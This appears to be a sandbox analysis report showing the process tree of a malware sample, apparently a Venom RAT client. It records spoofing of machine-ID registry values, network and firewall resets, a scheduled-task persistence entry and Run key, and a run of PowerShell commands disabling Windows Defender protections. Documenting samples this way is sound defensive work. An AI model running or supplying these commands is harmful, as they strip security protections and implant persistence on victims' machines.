                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:784
                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                              REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d 307927789284686248232012692220961243075515322662832829100 /f
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:6028
                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:5640
                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                  REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d 307927789284686248232012692220961243075515322662832829100 /f
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                  • Modifies registry key
                                                                                                                                                                                                                                                                  PID:460
                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:3236
                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                    REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d 307927789284686248232012692220961243075515 /f
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                                                                                                                    PID:244
                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%%random% /f
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:4648
                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 30792778928468 /f
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • Modifies registry key
                                                                                                                                                                                                                                                                      PID:5636
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%%random% /f
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:3020
                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                        REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 30792778928468 /f
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                        • Modifies registry key
                                                                                                                                                                                                                                                                        PID:4540
                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%%random% /f
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:5812
                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                          REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 30792778928468 /f
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                                                                                                                          PID:580
                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d %random%%random%%random% /f
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:5212
                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d 30792778928468 /f
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:4308
                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:5508
                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 307927789284686248232012692220961243075515322662832829100 /f
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:5836
                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductPfn /t REG_SZ /d Microsoft.Windows.%random%.%random%-%random%_%random%%random% /f
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:2112
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                    REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductPfn /t REG_SZ /d Microsoft.Windows.30792.7789-28468_624823201 /f
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                                                                                                                                    PID:4612
                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductContentId /t REG_SZ /d {%random%-%random%-%random%-%random%} /f
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:964
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Direct3D /v WHQLClass /f
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:1516
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                        reg delete HKCU\Software\Microsoft\Direct3D /v WHQLClass /f
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                        • Modifies registry key
                                                                                                                                                                                                                                                                                        PID:5216
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User" "Shell" "Folders /v History /f
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:688
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                          reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User" "Shell" "Folders /v History /f
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:4952
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings\5.0\Cache /f
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:2500
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                              reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings\5.0\Cache /f
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                              • Modifies registry key
                                                                                                                                                                                                                                                                                              PID:2012
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:4776
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:1856
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:1028
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh winsock reset
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:5864
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                      netsh winsock reset
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                                                                      PID:4992
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh int ip reset
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:4876
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                        netsh int ip reset
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                          PID:4208
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall reset
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:4996
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                            netsh advfirewall reset
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                            PID:2352
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:5648
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ipconfig /release
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:2876
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                                                                                                                                ipconfig /release
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                • Gathers network information
                                                                                                                                                                                                                                                                                                                PID:4736
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ipconfig /renew
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:3536
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                                                                                                                                  ipconfig /renew
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Gathers network information
                                                                                                                                                                                                                                                                                                                  PID:4752
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c arp -d
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:4888
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\ARP.EXE
                                                                                                                                                                                                                                                                                                                    arp -d
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                      PID:1400
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh interface ip delete arpcache
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:2808
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c start C:\Windows\IME\networkclean.exe
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:2768
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:872
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:2412
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c %systemdrive%\Windows\IME\adapters.exe
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:4404
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                            PID:3840
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                              "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Windows\SysWOW64\Images.exe" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                              PID:5052
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                              PID:5604
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Windows\SysWOW64\Images.exe" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                PID:5232
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                PID:760
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution2.vbs"
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                PID:1768
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution5.vbs"
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                                PID:1180
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                  PID:2592
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                  PID:1856
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                  PID:4696
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                  PID:5992
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                    PID:4976
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                      PID:6060
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                        PID:4932
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:2576
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                            PID:660
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                              PID:3392
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                PID:3128
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1940
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5492
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                      PID:2716
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                        PID:4764
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                          PID:2004
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\Images.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SysWOW64\Images.exe"
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                            PID:876
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                            PID:1944
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1160
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                PID:5544
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:4268
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:5476
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5096
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:3576
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:876
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:5208
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:3620
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:4088
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                PID:3224
